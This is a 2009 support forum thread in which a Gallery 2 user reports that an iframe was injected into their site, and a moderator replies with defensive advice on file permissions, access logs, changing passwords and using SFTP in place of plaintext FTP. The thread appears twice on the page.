Site Hacked

stender

Joined: 2008-01-04
Posts: 22

Posted: Mon, 2009-06-29 06:37

I have a site running Gallery 2 and I've just found it's been hacked. An Iframe has been placed in the header of my home page and my gallery homepage, also my gallery is no longer working.
I'm having to re-install (don'r ask) but am concerned how they got in so I can make sure it doesn't happen again. Any ideas?

Unfortunatley my site was ranked on page 1 of google but now is not hand is marked as "this site may harm your computer"

nivekiam

Joined: 2002-12-10
Posts: 16501

Posted: Mon, 2009-06-29 12:06

You don't mention anything about what version of Gallery you were using.

You don't mention if you are/were using any other software on the site, WordPress, Drupal, or some custom software, etc.

If running version 2.3 I really doubt they got through via Gallery, but there are security concerns with older versions of Gallery which have been fixed in 2.3. Have you looked at your access logs? Did you find out which files exactly where changed? Are you on a shared server? Who does the web server run as? Are your files marked as writable by the web server user?
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

stender

Joined: 2008-01-04
Posts: 22

Posted: Mon, 2009-06-29 12:35

unfortunately I have moved to a new host now and only kept my images. However I am trying to install 2.3 from scratch and fallen at the first hurdle. I cannot get to the install page and my host isn't very helpful. I just get a 500 internal server error. He said the server doesn't allow to chmod 777 only to 755. I'm totally lost now and without a gallery.

nivekiam

Joined: 2002-12-10
Posts: 16501

Posted: Mon, 2009-06-29 12:54

Find a better host. Doesn't sound like one you'd want to use anyway. You do get what you pay for:
http://gallery.menalto.com/node/88391
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

stender

Joined: 2008-01-04
Posts: 22

Posted: Mon, 2009-06-29 14:20

According to them gallery2 needs re-writing as chmoding 777 is very insecure. they only allow 755 max. looks like i'm getting nowhere!

nivekiam

Joined: 2002-12-10
Posts: 16501

Posted: Mon, 2009-06-29 15:23

It depends on how your host is setup. If the webserver runs under your user account and can create files and directories under g2data, then 755 is all you need. If the webserver runs as a different user account (nobody, apache, www, etc) then it needs to be either 775 or 777 depending on how your host is setup so that the webserver and create files and directories under g2data.

If your host is setup with the second configuration and still won't let you change permissions to allow the webserver to write to g2data, then you should find a different host. No web-based application I've seen will work on their servers, Wordpress, Drupal, Gallery, Coppermine, and many, many others all require the webserver to be able to create, delete, modify files under a particular directory or directories.
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

stender

Joined: 2008-01-04
Posts: 22

Posted: Wed, 2009-07-01 08:29

Having moved my site to another host (albeit with galley still not working) my site has been hacked again. An I frame has been placed on my home page header and something has been done to gallery main. Any ideas how I can find out how they are getting in? it's happened only to one site but on 2 different hosts.

nivekiam

Joined: 2002-12-10
Posts: 16501

Posted: Wed, 2009-07-01 13:26

I don't see anywhere, where you've addressed anything I've mentioned.

Did you change passwords?

Are you using FTP instead of SFTP or telnet instead of SSH?

Have you checked to make sure your computer doesn't have a virus?

Did you do a clean install of Gallery?

Check your file integrity: FAQ: How can I make sure that my installation files are all intact?

Are you running other software, WordPress, Drupal, Joomla, etc?

PM me your site URL and I'll take a closer look. Probably have to wait until tonight when I have access to my Linux box at home.
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

stender

Joined: 2008-01-04
Posts: 22

Posted: Thu, 2009-07-02 09:41

Hi, Yes I have changed my password,
I am using dreamweaver to ftp my files,
I do not have a virus.
I have managed to do a new install using fantastico to install.
This morning my site seems unaffected but I would still like to track how the site was hacked.
I still have to remember how to alter my carbon theme to get it back as it was.

nivekiam

Joined: 2002-12-10
Posts: 16501

Posted: Thu, 2009-07-02 13:10

Quote:

I am using dreamweaver to ftp my files,

While I know that's convenient, I would look into another method for transferring your files. FTP sends everything in clear text, username, password, etc. So someone listening in the middle can pick it up. For example, you go to a local coffee shop that has free wifi with no password to get onto their network. Now all of your traffic is unencrypted. So anyone can watch all the traffic. Now if someone FTPs something they have the address, username and password with very little effort. If your host supports SFTP, I'd look into using that, though it would probably mean no more transferring with DreamWeaver. FileZilla is one free client that support SFTP:
http://filezilla-project.org/

Quote:

This morning my site seems unaffected but I would still like to track how the site was hacked.

Probably only going to be able to do that if you check your access logs.

Quote:

I still have to remember how to alter my carbon theme to get it back as it was.

If you have an old copy of your stuff, check out Beyond Compare by www.scootersoftware.com They have a trial. You can use that to compare old with new and see what needs to be changed. Sure you can also use diff or some other tools, but Beyond Compare has such a nice GUI I've been using it for a long time.

____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

stender

Joined: 2008-01-04
Posts: 22

Posted: Fri, 2009-07-03 06:25

thanks for the help

nivekiam

Joined: 2002-12-10
Posts: 16501

Posted: Mon, 2009-07-13 17:03

And to add to this, since you mentioned Dreamweaver and I just learned that there are trojans out there that dig around in Dreamweaver and other FTP program's config files for login credentials:
http://it.slashdot.org/story/09/07/13/142210/RIPFTP?art_pos=2

Best to probably not save your passwords in such programs to start with. Also, don't use FTP. If your host doesn't offer a secure method of file transfer, find a different host.

____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

stender Joined: 2008-01-04 Posts: 22	Posted: Mon, 2009-06-29 06:37
	I have a site running Gallery 2 and I've just found it's been hacked. An Iframe has been placed in the header of my home page and my gallery homepage, also my gallery is no longer working. I'm having to re-install (don'r ask) but am concerned how they got in so I can make sure it doesn't happen again. Any ideas? Unfortunatley my site was ranked on page 1 of google but now is not hand is marked as "this site may harm your computer"
	XUser login Username: * Password: * Create new account Request new password
nivekiam Joined: 2002-12-10 Posts: 16501	Posted: Mon, 2009-06-29 12:06
	You don't mention anything about what version of Gallery you were using. You don't mention if you are/were using any other software on the site, WordPress, Drupal, or some custom software, etc. If running version 2.3 I really doubt they got through via Gallery, but there are security concerns with older versions of Gallery which have been fixed in 2.3. Have you looked at your access logs? Did you find out which files exactly where changed? Are you on a shared server? Who does the web server run as? Are your files marked as writable by the web server user? ____________________________________________ Like Gallery? Like the support? Donate now!!! See G2 live here

stender Joined: 2008-01-04 Posts: 22	Posted: Mon, 2009-06-29 12:35
	unfortunately I have moved to a new host now and only kept my images. However I am trying to install 2.3 from scratch and fallen at the first hurdle. I cannot get to the install page and my host isn't very helpful. I just get a 500 internal server error. He said the server doesn't allow to chmod 777 only to 755. I'm totally lost now and without a gallery.

nivekiam Joined: 2002-12-10 Posts: 16501	Posted: Mon, 2009-06-29 12:54
	Find a better host. Doesn't sound like one you'd want to use anyway. You do get what you pay for: http://gallery.menalto.com/node/88391 ____________________________________________ Like Gallery? Like the support? Donate now!!! See G2 live here

stender Joined: 2008-01-04 Posts: 22	Posted: Mon, 2009-06-29 14:20
	According to them gallery2 needs re-writing as chmoding 777 is very insecure. they only allow 755 max. looks like i'm getting nowhere!

nivekiam Joined: 2002-12-10 Posts: 16501	Posted: Mon, 2009-06-29 15:23
	It depends on how your host is setup. If the webserver runs under your user account and can create files and directories under g2data, then 755 is all you need. If the webserver runs as a different user account (nobody, apache, www, etc) then it needs to be either 775 or 777 depending on how your host is setup so that the webserver and create files and directories under g2data. If your host is setup with the second configuration and still won't let you change permissions to allow the webserver to write to g2data, then you should find a different host. No web-based application I've seen will work on their servers, Wordpress, Drupal, Gallery, Coppermine, and many, many others all require the webserver to be able to create, delete, modify files under a particular directory or directories. ____________________________________________ Like Gallery? Like the support? Donate now!!! See G2 live here

stender Joined: 2008-01-04 Posts: 22	Posted: Wed, 2009-07-01 08:29
	Having moved my site to another host (albeit with galley still not working) my site has been hacked again. An I frame has been placed on my home page header and something has been done to gallery main. Any ideas how I can find out how they are getting in? it's happened only to one site but on 2 different hosts.

nivekiam Joined: 2002-12-10 Posts: 16501	Posted: Wed, 2009-07-01 13:26
	I don't see anywhere, where you've addressed anything I've mentioned. Did you change passwords? Are you using FTP instead of SFTP or telnet instead of SSH? Have you checked to make sure your computer doesn't have a virus? Did you do a clean install of Gallery? Check your file integrity: FAQ: How can I make sure that my installation files are all intact? Are you running other software, WordPress, Drupal, Joomla, etc? PM me your site URL and I'll take a closer look. Probably have to wait until tonight when I have access to my Linux box at home. ____________________________________________ Like Gallery? Like the support? Donate now!!! See G2 live here

stender Joined: 2008-01-04 Posts: 22	Posted: Thu, 2009-07-02 09:41
	Hi, Yes I have changed my password, I am using dreamweaver to ftp my files, I do not have a virus. I have managed to do a new install using fantastico to install. This morning my site seems unaffected but I would still like to track how the site was hacked. I still have to remember how to alter my carbon theme to get it back as it was.

nivekiam Joined: 2002-12-10 Posts: 16501	Posted: Thu, 2009-07-02 13:10
	Quote: I am using dreamweaver to ftp my files, While I know that's convenient, I would look into another method for transferring your files. FTP sends everything in clear text, username, password, etc. So someone listening in the middle can pick it up. For example, you go to a local coffee shop that has free wifi with no password to get onto their network. Now all of your traffic is unencrypted. So anyone can watch all the traffic. Now if someone FTPs something they have the address, username and password with very little effort. If your host supports SFTP, I'd look into using that, though it would probably mean no more transferring with DreamWeaver. FileZilla is one free client that support SFTP: http://filezilla-project.org/ Quote: This morning my site seems unaffected but I would still like to track how the site was hacked. Probably only going to be able to do that if you check your access logs. Quote: I still have to remember how to alter my carbon theme to get it back as it was. If you have an old copy of your stuff, check out Beyond Compare by www.scootersoftware.com They have a trial. You can use that to compare old with new and see what needs to be changed. Sure you can also use diff or some other tools, but Beyond Compare has such a nice GUI I've been using it for a long time. ____________________________________________ Like Gallery? Like the support? Donate now!!! See G2 live here

stender Joined: 2008-01-04 Posts: 22	Posted: Fri, 2009-07-03 06:25
	thanks for the help

nivekiam Joined: 2002-12-10 Posts: 16501	Posted: Mon, 2009-07-13 17:03
	And to add to this, since you mentioned Dreamweaver and I just learned that there are trojans out there that dig around in Dreamweaver and other FTP program's config files for login credentials: http://it.slashdot.org/story/09/07/13/142210/RIPFTP?art_pos=2 Best to probably not save your passwords in such programs to start with. Also, don't use FTP. If your host doesn't offer a secure method of file transfer, find a different host. ____________________________________________ Like Gallery? Like the support? Donate now!!! See G2 live here

XUser login